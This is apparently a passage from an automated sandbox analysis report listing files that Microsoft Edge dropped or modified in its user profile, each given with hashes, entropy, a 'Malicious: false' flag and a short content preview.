SSDEEP:	192:st4J99QTryDigabatSuyp7sogdsZihUkgM/NYn8hbV+Fu+QwCL66WjaFIMYXP7U8:st4PGKSu47sogdfhJBbGNQwP6WjaTYDN
MD5:	C7F98F05BAAB7E63239EF75E33B45563
SHA1:	0B68D90E5EB4600837C69F3F5E5BD4E7A2180D05
SHA-256:	960E7B6448363E4CBE0D437DDB125FD8FBA22043422C7B5F8ED0493E90EB35CA
SHA-512:	CAD33EC9DDE3CF87B1F3A2CAC319808DD8DD88E7B8D479A4A65671EE0BEBB5EAA60EF03752CA9FE2F1EED5658CBE9192D38FCAEAAFFB9BA78BC034F19BFB450F
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375684514153445","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\PriceComparison\PriceComparisonAssetStore.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\PriceComparison\PriceComparisonAssetStore.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	modified
Size (bytes):	83572
Entropy (8bit):	5.66417109034541
Encrypted:	false
SSDEEP:	1536:aL0/Ry7vm2lhq4ljc+PjfOzBu+RMDVogUlcPCcBjjmny8dLA8j7baD7:aL6yLm2fq4pc+rCAogU2CcBjj3YAg7mn
MD5:	966445BE3905933EFD72ED90ECBAAF79
SHA1:	40896A274F993AF43D2159C193CE5E297A04864D
SHA-256:	17E00F6B905D07D045D4F6CA354F107EBFFE2DD9CC2CFD8E717F17AEFB153E14
SHA-512:	F3ACBC364F6D7F5BE3C4706A09A561B8024AC98A7F101EE731B7457DB0B6AF671785713FE36C438FA6E1A92B6809A1E5E627AC3800D5D12224897E7D95884820
Malicious:	false
Preview:	...m.................DB_VERSION.1....j...............(QUERY_TIMESTAMP:product_category_en1...13375684619740308..QUERY:product_category_en1....[{"name":"product_category_en","url":"https://edgeassetservice.azureedge.net/assets/product_category_en/1.0.0/asset?assetgroup=ProductCategories","version":{"major":1,"minor":0,"patch":0},"hash":"r2jWYy3aqoi3+S+aPyOSfXOCPeLSy5AmAjNHvYRv9Hg=","size":82989}]...yg~..............!ASSET_VERSION:product_category_en.1.0.0..ASSET:product_category_en...."..3....Car & Garage..Belts & Hoses.#..+....Sports & Outdoors..Air Pumps.!.."....Car & Garage..Body Styling.4..5./..Gourmet Food & Chocolate..Spices & Seasonings.'..,."..Sports & Outdoors..Sleeping Gear.!..6....Lawn & Garden..Hydroponics.9.a.5..Books & Magazines. Gay & Lesbian Interest Magazines....+....Office Products..Pins.,..3.'..Kitchen & Housewares..Coffee Grinders.$..#....Computing..Enterprise Servers.#..&....Home Furnishings..Footboards.6...2..Books & Magazines..Computer & Internet Magazines.)..

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\PriceComparison\PriceComparisonAssetStore.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\PriceComparison\PriceComparisonAssetStore.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	309
Entropy (8bit):	5.19028974094158
Encrypted:	false
SSDEEP:	6:H2yTK1923oH+TcwtgctZQInvB2KLlV2yDpQL+q2P923oH+TcwtgctZQInvIFUv:nYebgGZznvFL3pQ+v4YebgGZznQFUv
MD5:	650FE4CB1DD93E967C2DC71441B64879
SHA1:	6C18CDE183EBA852C1F0A2BC3C479208C02332B6
SHA-256:	45444FDD7923DF93DCD76200A4774BD77D6D1C4EE862F57A8EFEAD175ACC57FD
SHA-512:	37FA43DADC61E8DCA6E88B4D67BD86EF82E889F6B8FF0B140454DCAC2215B8798D684341156CD1900914B6B1357EE460B0467D86603D55456444A3E74B534A6C
Malicious:	false
Preview:	2024/11/09-22:56:58.694 1e5c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\PriceComparisonAssetStore.db since it was missing..2024/11/09-22:56:58.719 1e5c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\PriceComparisonAssetStore.db/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\PriceComparison\PriceComparisonAssetStore.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	37149
Entropy (8bit):	5.5644295154021375
Encrypted:	false
SSDEEP:	768:tSdGSpWPtFfBu8F1+UoAYDCx9Tuqh0VfUC9xbog/OVOhvArtyrw0vTYqKpWtuX:tSdGSpWPtFfBuu1jabhvct30vTxft8
MD5:	2D9BA514612F4756AED21FB286AAB522
SHA1:	01A3F63FD1114DB7DDE2927D4B44BEB663663778
SHA-256:	919CBD9EC2E94237EC403B85DDACD66DD916B4D5930A857A9FD0867857C25D40
SHA-512:	7F1BC51D2C4C4C7F72AFBD37417F77148AA660AC404B67649FAB2B6A17CD84264BF11D3C3592881908DDB88F14241374590E072C8C078BEBAAA6505791332F90
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13375684513569482","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13375684513569482","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF3ab74.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	37149
Entropy (8bit):	5.5644295154021375
Encrypted:	false
SSDEEP:	768:tSdGSpWPtFfBu8F1+UoAYDCx9Tuqh0VfUC9xbog/OVOhvArtyrw0vTYqKpWtuX:tSdGSpWPtFfBuu1jabhvct30vTxft8
MD5:	2D9BA514612F4756AED21FB286AAB522
SHA1:	01A3F63FD1114DB7DDE2927D4B44BEB663663778
SHA-256:	919CBD9EC2E94237EC403B85DDACD66DD916B4D5930A857A9FD0867857C25D40
SHA-512:	7F1BC51D2C4C4C7F72AFBD37417F77148AA660AC404B67649FAB2B6A17CD84264BF11D3C3592881908DDB88F14241374590E072C8C078BEBAAA6505791332F90
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13375684513569482","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13375684513569482","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2294
Entropy (8bit):	5.832084093023385
Encrypted:	false
SSDEEP:	48:F2em8trdDmfBWFXrdZBkrdDJBW7C+rdCBWM:F1m8txDmQZxZBkxDKm+xfM
MD5:	459E974F29351B745DF06BF1FCCFF3AA
SHA1:	8415248A49FCEBAF84C3AAA09D4F403CAF63F93B
SHA-256:	A59DBACA931DF999E07B52F00BE7FA5EDB13E56282E3E44D935A5D6CA5ADADDF
SHA-512:	DD1E1679127EB8F82D9B090B087A0936EAAB9A6F66D248DCF6A6D9786248A45EF8F6FA10AC0EE7A626187835A7D38A77A972B856CB4DF27857DF28A6ED7E5CFE
Malicious:	false
Preview:	....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2....m................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.+INITDATA_UNIQUE_ORIGIN:https://ntp.msn.com/...REG:https://ntp.msn.com/.0......https://ntp.msn.com/edge/ntp...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true .(.0.8.......@...Z.b.....trueh..h..h..h..h..h..h..h..h..h..h.!p.x.................................REGID_TO_ORIGIN:0.https://ntp.msn.com/..RES:0.0.......https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enable

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	299
Entropy (8bit):	5.167963005223309
Encrypted:	false
SSDEEP:	6:H2QcaEq1923oH+TcwtE/a252KLlV2HAVq2P923oH+TcwtE/a2ZIFUv:HcPfYeb8xLJv4Yeb8J2FUv
MD5:	46302C906015A5EC916899C52AA5EAB8
SHA1:	BBE2A790744867C657FAEE56CBAC5CCE2E1C36B4
SHA-256:	FA2280A1E3149320BB735336B8E960CEAE5B49E274DB32611B9AAFABF7A754A9
SHA-512:	9398D0031F33BE71573FC3215AF07CF4BBEAE341A05C5AD0B8C6FDD8146E4CD0B135843E81A40C4C630A9A6AD33028FDD89DCCE179EDF5142F6B3081BB9B0BAE
Malicious:	false
Preview:	2024/11/09-22:55:24.296 1dd0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/11/09-22:55:24.307 1dd0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	113649
Entropy (8bit):	5.578431451108927
Encrypted:	false
SSDEEP:	1536:sa906yxPXfOrr1lhCe1+46rCjF3NlH2BoOz/0iL/rDL/rQmDs:f9LyxPXfOrr1lMe1z6rWXU8iL/HL/e
MD5:	BFEE1E2CF59D264A69A52A6A54FF9525
SHA1:	E0AE7BC8E198A78B060A164A4AB816AF3842DC3F
SHA-256:	50E48BA62599657131298D16782E52951C1302261ABF0032054B8B4EF393E116
SHA-512:	8B1B8393334877CDA1A08EC61E90DF150687E37885E5CF858FD59284612521DD225083B5D281DE13A07955DD859D0E65943DC968AED423476CBDAC395B03BC69
Malicious:	false
Preview:	0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this\|\|new Function("return this")()}catch(e){if("object"==typeof window

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	187825
Entropy (8bit):	6.3830695505781065
Encrypted:	false
SSDEEP:	3072:1sibnwrc+Xb4wwt7VgISEP625at3C4Kcat7HL/nE0koC4vY:4UwwlSFMWCjcaxL/Ex4vY
MD5:	9A6ECE312C5A1C10A4AE6136791C98AB
SHA1:	DED7CE1F31CEEA08086C1F283E22D609769A027E
SHA-256:	2464DF7A1BD1A6A091054B6655608F477FD3DDC77EB493DEA1BB6B1A2A25C72F
SHA-512:	D5CB077C8F50035238ADBA5FFECFD7BF88953D4574CEEE788E52F5237BC8786C48A15740286C3F8799F312347E1D684686C707033A67C2541DB0B206CD30A47E
Malicious:	false
Preview:	0\r..m..........rSG.....0....z3.................;....x.X........,T.8..`,.....L`.....,T...`......L`......Rc........exports...Rc.,.n....module....RcF..F....define....Rb.%K.....amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...\|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H......q.Q.m.f...b...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true..a........Db............D`.....A..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da.....S...,T.`.`z.....L`..........a............a.........Dr8................/....-.......}....4..

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	2.1431558784658327
Encrypted:	false
SSDEEP:	3:m+l:m
MD5:	54CB446F628B2EA4A5BCE5769910512E
SHA1:	C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
SHA-256:	FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
SHA-512:	8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
Malicious:	false
Preview:	0\r..m..................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	3.5931902015385067
Encrypted:	false
SSDEEP:	3:rayXl/lrV/lxEwltzmUGo:p6QAu
MD5:	E59AD63A6A72F311B65AAEDD08E1935D
SHA1:	BE206D2C9AC7B70555A687BAEA114851091C3E27
SHA-256:	301DAC0017BFC5F050EEDDB45508558855533E0A9DA73A4D729F723992FE2170
SHA-512:	790A1D1627F34B3422F126E63AAA90BBDDC0D910585BEB0FB79F47E22650F553090E048209F53DB42FFDEE6048F4CB79BCC6C807E356A55F43902CE79DA12045
Malicious:	false
Preview:	@...^...oy retne.........................X....,.................q.<../.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	3.5931902015385067
Encrypted:	false
SSDEEP:	3:rayXl/lrV/lxEwltzmUGo:p6QAu
MD5:	E59AD63A6A72F311B65AAEDD08E1935D
SHA1:	BE206D2C9AC7B70555A687BAEA114851091C3E27
SHA-256:	301DAC0017BFC5F050EEDDB45508558855533E0A9DA73A4D729F723992FE2170
SHA-512:	790A1D1627F34B3422F126E63AAA90BBDDC0D910585BEB0FB79F47E22650F553090E048209F53DB42FFDEE6048F4CB79BCC6C807E356A55F43902CE79DA12045
Malicious:	false
Preview:	@...^...oy retne.........................X....,.................q.<../.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF3d6aa.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	3.5931902015385067
Encrypted:	false
SSDEEP:	3:rayXl/lrV/lxEwltzmUGo:p6QAu
MD5:	E59AD63A6A72F311B65AAEDD08E1935D
SHA1:	BE206D2C9AC7B70555A687BAEA114851091C3E27
SHA-256:	301DAC0017BFC5F050EEDDB45508558855533E0A9DA73A4D729F723992FE2170
SHA-512:	790A1D1627F34B3422F126E63AAA90BBDDC0D910585BEB0FB79F47E22650F553090E048209F53DB42FFDEE6048F4CB79BCC6C807E356A55F43902CE79DA12045
Malicious:	false
Preview:	@...^...oy retne.........................X....,.................q.<../.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4819
Entropy (8bit):	3.4441968772914837
Encrypted:	false
SSDEEP:	96:TxFYbI0skE061p3ZfG9Xp+TP+dU6ookca5SLl9iSri1zIDkNI+Z7F:vYU8Eh1u9Xp+zqU6oDb5SLl9iSriCDJg
MD5:	01B23563D0D1527E600775B5DA853810
SHA1:	503A0ED7E0F0829422301E59E7779D82D8F12B9A
SHA-256:	8F4ABF480CFBF73554DDEF69DE1F14E72DDF9E6E436838B40DCD7F3EB9D1F2B8
SHA-512:	5F834AE5BCC3C1AEA1AA85B6943728EDD1A5803583E7C09AD4BAED11C2CEE14A62B6A59C9CF27B87B5A5AA39C79177B3E723DB193632D1116AD88BBA7D674956
Malicious:	false
Preview:	*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f................e.\b................next-map-id.1.Cnamespace-12d47a5a_59ef_4e12_89ad_afe0d1372099-https://ntp.msn.com/.0.f.s.................map-0-shd_sweeper."{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.h.p.-.d.i.s.p.o.l.l.,.p.r.g.-.c.a.l.-.5.c.o.l.u.m.n.c.,.p.r.g.-.i.n.f.o.p.-.a.d.s.-.d.l.-.t.2.,.s.p.-.l.a.y.-.c.t.l.,.p.r.g.-.1.s.w.-.s.a.e.e.b.k.t.,.1.s.w.-.t.p.s.n.-.d.s.t.p.r.g.1.d.c.y.-.c.,.p.r.g.-.1.s.w.-.c.-.r.i.v.c.o.v.r.d.h.i.g.h.,.2.4.0.9.-.n.e.w.-.b.i.n.g.-.d.e.s.i.g.n.-.t.,.p.r.g.-.a.d.s.p.e.e.k.,.1.s.-.c.g.-.c.g.m.o.d.e.l.r.,.t.r.a.f.f.i.c.-.p.r.2.-.t.s.k.b.-.c.a.r.,.p.r.g.-.p.r.2.-.t.s.k.b.-.c.a.r.,.p.r.g.-.p.r.2.-.w.i.d.g.e.t.-.t.a.b.,.p.r.g.-.p.r.2.-.t.r.d.i.s.c.l.o.2.,.p.r.g.-.p.r.2.-.t.r.d.i.s.c.l.o.,.b.t.i.e.-.u.x.s.i.g.n.a.l.s.-.c.,.p.r.g.-.a.d.-.p.a.s.s.-.s.i.g.-.c.,.b.t.i.e.-.m.s.n.l.k.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.176083336831029
Encrypted:	false
SSDEEP:	6:H2Sf9+q2P923oH+TcwtrQMxIFUt8Y2NJZmw+Y2v9VkwO923oH+TcwtrQMFLJ:Nl+v4YebCFUt8p/+fV5LYebtJ
MD5:	BD83D0B04F6C6E106870C18649CE7290
SHA1:	77A02BC3D76612D13B5BB8CDC997C608B1E89A1C
SHA-256:	5589462E48AB661B83055DC30065ABF681196C1F21FF59CFB43AC3C0382BA918
SHA-512:	06B69C79F9DC6E708C71A480697ADDDA81440A4BECEFDA255687818CADF82176B4546BBB17EB3980C18929AE3D25EB0B93F37FE3F96FE4E5842968CAD6756640
Malicious:	false
Preview:	2024/11/09-22:55:14.769 1ebc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/09-22:55:14.771 1ebc Recovering log #3.2024/11/09-22:55:14.773 1ebc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.176083336831029
Encrypted:	false
SSDEEP:	6:H2Sf9+q2P923oH+TcwtrQMxIFUt8Y2NJZmw+Y2v9VkwO923oH+TcwtrQMFLJ:Nl+v4YebCFUt8p/+fV5LYebtJ
MD5:	BD83D0B04F6C6E106870C18649CE7290
SHA1:	77A02BC3D76612D13B5BB8CDC997C608B1E89A1C
SHA-256:	5589462E48AB661B83055DC30065ABF681196C1F21FF59CFB43AC3C0382BA918
SHA-512:	06B69C79F9DC6E708C71A480697ADDDA81440A4BECEFDA255687818CADF82176B4546BBB17EB3980C18929AE3D25EB0B93F37FE3F96FE4E5842968CAD6756640
Malicious:	false
Preview:	2024/11/09-22:55:14.769 1ebc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/09-22:55:14.771 1ebc Recovering log #3.2024/11/09-22:55:14.773 1ebc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13375684516080294

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1443
Entropy (8bit):	3.8344929719525758
Encrypted:	false
SSDEEP:	24:3QUHQGdtFh8FOTlyecHdpsAF4unxCfrtLp3X2amEtG1ChqkBwqN+yodWMAQKkOAl:3aa3hBQzFiLp2FEkChmAV4WMRHOp
MD5:	30180EB8F84A98ECBB309DEC4B491B07
SHA1:	AE08680EB6874B72C6D3B03B0E3D1822E0243335
SHA-256:	97F25B2FD707F3CF94111643E4F1EF60A39F1172FD9B3AFC4966FEB785208FC8
SHA-512:	528D8090E96A43B0A5C2BE227960F7AE5D2D21025026463770767A1723E0CC2F621FDC1A62C390BF051CB0AA0591DFA3A73457875394105E57753E7D1E555AC8
Malicious:	false
